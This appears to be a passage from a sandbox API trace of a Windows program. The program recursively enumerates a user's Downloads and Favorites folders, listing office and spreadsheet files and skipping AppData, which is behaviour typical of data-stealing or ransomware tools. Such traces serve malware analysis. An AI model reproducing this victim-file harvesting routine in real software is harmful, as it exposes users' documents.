PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.501] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c77ab30, ftCreationTime.dwHighDateTime=0x1d5dfc3, ftLastAccessTime.dwLowDateTime=0x99fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0x99fe6ad0, ftLastWriteTime.dwHighDateTime=0x1d5d97b, nFileSizeHigh=0x0, nFileSizeLow=0xa8f4, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="T8zO.ots", cAlternateFileName="")) returned 1 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c95c9b0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xd9387fe0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xd9387fe0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x137f5, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="vupb0.pps", cAlternateFileName="")) returned 1 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x14c0058, ftCreationTime.dwLowDateTime=0x442d, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x13a0059, nFileSizeHigh=0x442d, nFileSizeLow=0x9ba9a8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="vu\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.502] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.503] FindClose (in: hFindFile=0x90afd8 | out: hFindFile=0x90afd8) returned 1 [0157.504] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658e8210, ftCreationTime.dwHighDateTime=0x1d5e481, ftLastAccessTime.dwLowDateTime=0x5efc4c10, ftLastAccessTime.dwHighDateTime=0x1d5dba4, ftLastWriteTime.dwLowDateTime=0x5efc4c10, ftLastWriteTime.dwHighDateTime=0x1d5dba4, nFileSizeHigh=0x0, nFileSizeLow=0xb478, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="RDv9Bzzuy Is9HIraE.csv", cAlternateFileName="RDV9BZ~1.CSV")) returned 1 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6682b0, ftCreationTime.dwHighDateTime=0x1d5e6a8, ftLastAccessTime.dwLowDateTime=0x8ad0cf40, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0x8ad0cf40, ftLastWriteTime.dwHighDateTime=0x1d5d902, nFileSizeHigh=0x0, nFileSizeLow=0x1084f, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="YNSVRvaq.rtf", cAlternateFileName="")) returned 1 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.504] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3772ae0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xf1b1dd60, ftLastAccessTime.dwHighDateTime=0x1d5d959, ftLastWriteTime.dwLowDateTime=0xf1b1dd60, ftLastWriteTime.dwHighDateTime=0x1d5d959, nFileSizeHigh=0x0, nFileSizeLow=0x4505, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="_--jWXD.odt", cAlternateFileName="")) returned 1 [0157.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.505] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x12a0069, ftCreationTime.dwLowDateTime=0x446c, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x112006a, nFileSizeHigh=0x446c, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="_-\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.505] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.505] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c097e0, ftCreationTime.dwHighDateTime=0x1d5a62a, ftLastAccessTime.dwLowDateTime=0xc1f13840, ftLastAccessTime.dwHighDateTime=0x1d599d6, ftLastWriteTime.dwLowDateTime=0xc1f13840, ftLastWriteTime.dwHighDateTime=0x1d599d6, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="YCwVOFdIAc7At.xlsx", cAlternateFileName="YCWVOF~1.XLS")) returned 1 [0157.505] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07c2050, ftCreationTime.dwHighDateTime=0x1d5e47a, ftLastAccessTime.dwLowDateTime=0x19f5cf50, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x19f5cf50, ftLastWriteTime.dwHighDateTime=0x1d5e2b7, nFileSizeHigh=0x0, nFileSizeLow=0x5acd, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="zw2wea8 QxA.csv", cAlternateFileName="ZW2WEA~1.CSV")) returned 1 [0157.505] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6343b140, ftCreationTime.dwHighDateTime=0x1d5966d, ftLastAccessTime.dwLowDateTime=0x1a09100, ftLastAccessTime.dwHighDateTime=0x1d59993, ftLastWriteTime.dwLowDateTime=0x1a09100, ftLastWriteTime.dwHighDateTime=0x1d59993, nFileSizeHigh=0x0, nFileSizeLow=0x143af, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="ZZwMa.docx", cAlternateFileName="ZZWMA~1.DOC")) returned 1 [0157.505] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x106007a, ftCreationTime.dwLowDateTime=0x44ab, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xf, ftLastWriteTime.dwHighDateTime=0x118007b, nFileSizeHigh=0x44ab, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ZZ\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.505] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.506] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0157.506] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Downloads", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0157.506] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.506] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.506] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.506] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.507] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x118007a, ftCreationTime.dwLowDateTime=0x44f4, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xf, ftLastWriteTime.dwHighDateTime=0xf6007b, nFileSizeHigh=0x44f4, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ዠⴞ\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.508] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.508] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0157.508] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Favorites", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0157.508] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.508] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.619] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.619] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.619] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Links", cAlternateFileName="")) returned 1 [0157.619] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Links", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0157.619] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.620] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.620] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.620] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0157.620] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0157.620] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x1120069, ftCreationTime.dwLowDateTime=0x4588, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x11a006a, nFileSizeHigh=0x4588, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="We\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.620] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.620] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0157.620] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft Websites", cchCount1=18, lpString2="AppData", cchCount2=7) returned 3 [0157.620] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.623] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, 